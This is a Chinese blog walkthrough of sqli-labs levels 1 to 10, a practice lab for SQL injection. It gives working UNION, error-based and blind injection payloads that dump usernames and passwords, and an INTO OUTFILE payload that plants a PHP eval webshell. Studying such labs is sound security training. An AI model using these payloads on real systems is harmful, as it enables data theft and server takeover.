mysql查询%3cnull%3e_sqli-labs-master前十关过关总结

最新推荐文章于 2023-10-19 09:43:15 发布
最新推荐文章于 2023-10-19 09:43:15 发布
阅读量1k 收藏 1
点赞数
文章标签: mysql查询%3cnull%3e
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36400198/article/details/113471872
版权
本文详细介绍了SQL注入攻击的各种类型和防范方法,包括报错注入、联合查询、时间盲注等,并提供了Windows命令行登录MySQL进行查验的步骤。通过实例展示了如何利用Firefox插件进行注入测试,以及如何通过布尔盲注和时间盲注判断条件。文章还提及了数据库的路径探测和权限检查,以及双引号闭合的判断。
摘要由CSDN通过智能技术生成

10af4c4f4a062fa9fa397a504c40e7f3.png

登入Windows命令行MySQL,方便查验注入命令

第一关:

在$_GET id 处注入

ddf44c69c55b324e615bc597d912b18c.png源码如下

只需构造闭合即可爆出数据

单引号’报错

查列数:

a7559e97d3da3cba4fd49fb93d855766.png

知道为3列之后使用sql联合查询语句:union

这里需要注意,使用联合查询爆出数据库名称的时候前面id值需要放空:

a91b9853642126aa12a1e1e1f09818a7.png

因为网页上能显示的只有第一行的内容

7a8453f9464fa4a6760b18c8798b53b5.png

6e7ce2e108cdbfcd5ff5832533815276.png

所以前面id值需要放空为“null”

查看所有数据库名称:

?id=' union select 1,group_concat(

schema_name),3 from

information_schema.schemata --+

9a1b26dacdcfaacf1f19fd0f18381a0e.png

查看所有表名:

?id=' union select 1,group_concat(

table_name),3 from

information_schema.tables where

table_schema='security' --+

e436579b44d450e49d073e964b34b81b.png

已知数据库名和表名,爆列名:

?id=' union select 1,group_concat(

column_name),3 from

information_schema.columns where

table_schema='security' and

table_name='users' --+

688c7b73b80826ba9ac81eea4fb35ae5.png

分别在2,3处显示username和password:

?id=' union select 1,group_concat(

username),group_concat(

password) from

users --+

dee41d289df3798e28836542c01cf8f4.png

第二关:

通第一关类型一致,但是为数字型报错,不需要闭合

c936addbc79db6983e196c9947f6e4b6.png

所有步骤同第一关一样

f687c47f18351c3eb7f94e9691e81ee7.png

第三关:

同上,报错为单引号+小括号:   ')

1a5fee301e73fec8f75be2a2bde00bb6.png

685c2a96a3abe301a67d445141a97c9f.png

第四关:

79ff5983a9f82a4e5485f343890a3e93.png

第五关:

报错型注入原理 https://www.cnblogs.com/-zhong/p/10892439.html

先构造出闭合,直到其为报错为止,就说明以及进去了

51905ef21b6ec4fd8c2416453a7d88e7.png

3af19db9822e8a4a611555d83bad4b0e.png

利用Firefox插件MaxHacKBar(f12)中的报错语句

c520a79f45b72c0c4d00d2e8b1d93950.png

第六关

同第五关一样

f488fc933ccbcae86c92eb994f326ef8.png

找到了闭合点一切就可以按照套路来了

第七关

e5b5a5ec524ed6b9a63fac3982b465f8.png

需要了解这两个函数,可以调出数据库的安装路径,以便通过菜刀连接远程服务器

da239c422297dbca08e815d913d8414d.png

钥匙我们需要写入木马文件,需要先判断是否具有写权限:

?id=1' and (select count(*)from mysql.user)>0 --+

若返回正常则具有写权限

http://192.168.43.221/sqli-labs-master/Less-7/?id=1%27))%20union%20select%20null,null,%27%3C?php%20@eval($_POST[qi]);?%3E%27%20into%20outfile%20muma.php%20--+

无法写入,理论上都是正确的。。。先走一步看一步,不要在这儿浪费太多的时间

第八关:

这一关是基于布尔的盲注,从报错的结果返回来判断我们的猜测是否正确

盲注需要掌握一些MySQL的相关函数:

length(str):返回str字符串的长度。

substr(str, pos, len):将str从pos位置开始截取len长度的字符进行返回。注意这里的pos位置是从1开始的,不是数组的0开始

mid(str,pos,len):跟上面的一样,截取字符串

ascii(str):返回字符串str的最左面字符的ASCII代码值。

ord(str):同上,返回ascii码

if(a,b,c) :a为条件,a为true,返回b,否则返回c,如if(1>2,1,0),返回0

正确的显示为:

6286b2511b1f2520c93ae19a6154df44.png

错误的显示为:

84f06f0222fdc2a1eefc3613493c5ea2.png

02f5cdec966b85e5259b49a4745994af.png

所以这里的闭合为单引号 :‘

先在dos上测试一下:

aa0e193d9ed8676773531cc358e72fe8.png

security第一个字母就是 s (这里也区分大小写哦)

故可以进行布尔判断:

?id=1' and if(ascii(substr((select database()),1,1))>114,1,0) --+

68a98a3bec36f4c7090c43ea7cbd11c3.png

规律同上面关卡所示

第九关:

基于布尔的时间盲注:

通过sleep()函数,通过web界面的返回时间长短判断是否被执行

括号内的数字代表延迟时间(单位是秒s)

在时间盲注上的sleep韩束位置选择,最好可以再是错次数交多处进行卡顿,这样可以大大节约测试时间

a34f451a2133c92b3a27f75e853fcd4f.png正在卡顿中....

?id=1' and if(ascii(substr((select database()),1,1))>114,1,sleep(2)) --+

同样套路

第十关:

发现标题是:

38df16fce9b37ce3270243ced62de2e2.png双引号,但是却一直是同样的“you are in ...”

那就该是被定向了,需要通过实践延迟函数来判断他的闭合区间:

?id=1" and sleep(5) --+

这个的返回时间明显加长了很多,那就是双引号了。

65ac3e7d6d84e2e3f65ba10a556ab49f.png

具体的时间注入这里就不想过深的去实践,因为太浪费时间,可以自己用python写出一个运行脚本或者是直接上工具SQLmap来进行测试;

马蹄厨房
关注
MicroBlaze_Spartan3_Sample.rar_SPARTAN-3E_microblaze_spartan mic
09-22
【标题】"MicroBlaze_Spartan3_Sample.rar_SPARTAN-3E_microblaze_spartan mic" 涉及的是MicroBlaze软核处理器在Xilinx Spartan-3E FPGA芯片上的应用示例。 MicroBlaze是Xilinx公司推出的一种可定制的32位RISC...
mysql 错误回显注入,SQL注入实战篇2--显错注入
weixin_31159999的博客
03-23 265
本次实战靶场用的封神台的SQL注入靶场。看过实战1后,咱们就直接来试试自己有没有学会。因为是靶场,所以肯定存在漏洞,咱们就不判断是否存在注入了。第一步:从页面显示来看,这种应该是一个数字型的回显注入。那么我们就来看看有几列。构造?id=1 and 1=1 group by 1发现页面没有报错,继续往后group by 2和group by 3...,当试到4的时候发现查询不到了,由此判断应该是有三...
sqli-labs 1~10关教程
jiji_king的博客
04-04 5810
sqlli-labs 1~10关教程 第一关 输入?id=1 出现如下图 输入id=1’ 出现语法错误 表示这里可能出现sql注入漏洞 进一步尝试 输入 id=1’ --+ 发现回显正常 用order by 判断该语句有几列数据 ?id=1’ order by 3 --+ order by 3 回显正常 order by 4 显示错误 证明有三列数据 具体解释见: 于是使用 函数查询,此时要将id=1改为一个数据库不存在的数值 比如888,给后面查询语句留显示位。此时注入语句为: ?id=
sqli-labs 1-10(GET型注入)新手通关详解(高手误入)
b1n的博客
07-16 3137
1.第一关是单引号字符型注入2.用--+进行注释,页面正常显示。
详细sqli-labs(1-65)通关讲解
m0_67401134的博客
07-30 1万+
如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。...
sql-labs注入1-10关
jinhezhai的博客
01-13 1066
sql-labs1-20
lcd.rar_LCD_SPARTAN-3E_lcd spartan 3_xilinx spartan 3an
09-21
总结,"lcd.rar_LCD_SPARTAN-3E_lcd spartan 3_xilinx spartan 3an"项目涉及到FPGA技术、LCD显示控制、硬件描述语言编程以及嵌入式系统的实际应用。通过理解这些知识点,开发者能够掌握在Xilinx Spartan-3E平台上...
ddr2.rar_SPARTAN-3E_ddr2_ddr2 xilinx_spartan 3A_spartan-3a
09-20
在本项目中,我们聚焦于Xilinx Spartan-3E系列FPGA(Field Programmable Gate Array)实现的DDR2控制器。Spartan-3E是Xilinx公司提供的低成本、高性能的FPGA解决方案,适用于各种嵌入式系统和数字信号处理应用。 ...
BlueCat.rar_BlueCat_SPARTAN-3E_Xilinx_linux spartan
09-22
标题“BlueCat.rar_BlueCat_SPARTAN-3E_Xilinx_linux spartan”提到了几个关键术语,它们是“BlueCat”,“Spartan-3E”,“Xilinx”以及“Linux Spartan”。这些术语揭示了这篇文档可能涉及的内容,即与Xilinx公司...
UART.rar_SPARTAN-3E_UART VHDL
09-21
3. **并行-串行转换器(Parity Generator and奇偶校验检查)**:UART可以支持奇偶校验位,以检测传输错误。这部分代码会生成或检查数据中的奇偶校验位。 4. **帧同步和数据流控制**:UART协议规定了起始位、数据位...
Sqlilabs靶场1-10关详解(Get请求式)
爱吃仡坨的Blog
10-16 2557
sqlilabs用到的是mysql数据库,mysql5.0以上版本自带的数据库是information_schema,其下有tables和columns两个表tables表中的table_name字段下是所有数据库存在的表名table_schema字段下是所有表名对应的数据库名。columns表中的column_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库。
sql-labs闯关1-10
ljlrookiebird的博客
04-11 561
原理跟第一关相同,单引号报错但是后面加注释又没办法使语句闭合,猜了半天是需要单引号和右括号才能使语句闭合,后台语句为select * from xxx where id=( '1' ) ,我们注入后的语句为:select * from xxx where id = (‘-1’)union select 1,2,database() --+ ')id=1' and if((length(database())>8),sleep(10),0) --+,页面十秒后加载。
sqli-labs十关记录
墨子辰的博客
01-29 726
目录第一题:布尔报错注入第二题:布尔报错注入第三题: 布尔报错注入 ‘ 报错第四题:布尔报错注入“ 报错第五题:双查询注入 ' 注入开始解题:第六题: 双查询注入 " 报错第七题:导出文件GET字符型注第八题: 布尔盲注第九题:基于时间盲注 ' 报错第十题:基于时间盲注 " 报错 第一题:布尔报错注入 ?id=1' ?id=1' and 1=1--+ 确认漏洞是否存在 ?id=1' order by 3--+ 确定字段数 ?id=-1' union select 1,2,3--+ 确定显示位置
最详细sqli-labs平台十关讲解
妙蛙种子吃了都会妙妙秒的妙脆角的博客
01-10 3350
最详细sqli-labs平台sql注入语法讲解 文章目录最详细sqli-labs平台sql注入语法讲解一、sql注入的简单介绍二、sqli-labs平台的搭建二、实验1.Less-1(single quotes)2.Less-2(intiger based)3.Less-3(single quotes with twist)4.Less-4(double quotes)5.Less-5 最近也是沉迷于学习sql注入,越是了解越是发现其中的奥妙与乐趣,在这篇文章中主要是以sqli-labs平台为例子,记录一些
html上%3c%%%3e,url编码与解码 - 枫桦宁
weixin_36074668的博客
06-16 3426
为何要将URL地址进行编码 然后发送到服务器端?协议规范: RFC 1738,定义了,url地址中,不能包含,除了,0-9的数字,大小写字母(a-zA-Z),短横线’-’之外的字母,但是我们的URL中不止这些字符还有一些特殊字符 比如$-_.+!*’(),这时候就需要我们进行编码传输。编码很简单, 就是将其值变为%xx而已,而xx就是该字符的16进制值而已。下面的表取自百度百科,...
php中%3ci%3e%3c/i%3e标签,php中urlencode与rawurlencode的区别
weixin_42517963的博客
03-10 2477
段时间说自己遇到了个《URL加号引发错误》的BUG,引起这个bug的原因就是自己在URL中使用了 urlencode 函数,该函数会把空格转换成加号,这样就导致URL解析出错,而空格只有转换成 %20 才可以可以正常解析,这时我们就需要使用 rawurlencode 函数。下面就介绍一下 urlencode 函数与 rawurlencode 函数的区别:urlencode 函数:返回字符串,此字...
URL中%数字表示符号对照
热门推荐
qq_32898021的博客
04-14 2万+
HTML Encoding Reference URL-encoding : ASCII Character %20 : space %21 : ! %22 : “ %23 : # %24 : $ %25 : % %26 : & %27 : ‘ %28 : ( %29 : ) %2A : * %2B : + %2C : , %2D : – %2E : . %2F : / %30 : 0 %...
SQL-labs通关1-10
最新发布
yang2684805720的博客
10-19 266
第1关---(单引号联合注入) 判断注入点,判断注入类型 ?id=1' 回显报错,说明存在注入点 ?id=1'--+ 回显正常说明为字符型注入 判断字段数 ?id=1 'order by 4--+ ?id=1 'order by 3--+ 4报错,3不报错,说明字段数为3 判断显示位 ?id=-1 'union select 1,2,3--+ 回显在2和3位置 获取当
sqli-labs 靶场通关(1-10)
知世郎
10-15 2107
第七关当在输入id=1,页面显示you are in... 当我们输入id=1'时显示报错,但是没有报错信息,这和我们之的关卡不一样,之都有报错信息。然后我输入id=1'--+时报错,这时候我们可以输入id=1')--+发现依然报错,之时我试试是不是双括号输入id=1'))--+,发现页面显示正常。id=1' and ascii(substr(database(),1,1))=115 -- qwe //正常 库名首字母ascii码115所对应的字母是s。id=2'的时候看到页面报错信息。
https://so.csdn.net/so/search?spm=1000.2115.3001.7498&q=chatgpt%E5%85%8D%E8%B4%B9%E4%BD%BF%E7%94%A8&t=&u=&utm_term=chatgpt%E5%85%8D%E8%B4%B9%E4%BD%BF%E7%94%A8&utm_medium=distribute.pc_toolbar_associateword.none-task-associate_word-opensearch_query-4-%3Cem%3Echatgpt%3C%2Fem%3E%E5%85%8D%E8%B4%B9%E4%BD%BF%E7%94%A8-null-null.179%5Ev5%5Epv&depth_1-utm_source=distribute.pc_toolbar_associateword.none-task-associate_word-opensearch_query-4-%3Cem%3Echatgpt%3C%2Fem%3E%E5%85%8D%E8%B4%B9%E4%BD%BF%E7%94%A8-null-null.179%5Ev5%5Epv&request_id=168845364616800227484776&opensearch_request_id=168845364616800227484776怎么解决
07-08
ChatGPT是一种由OpenAI训练的大型语言模型。它的原理是基于Transformer架构,通过预训练大量文本数据来学习如何生成人类可读的文本,然后通过接受输入并生成输出来实现对话。 ChatGPT的用途非常广泛,可以用于自然语言处理(NLP)任务,如对话生成、问答系统、文本生成等。 如果你想使用ChatGPT,你可以用它来构建对话机器人,回答问题,生成文本等。它的应用非常广泛,可以用于各种场景,如客服、帮助提供者、教育机构等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值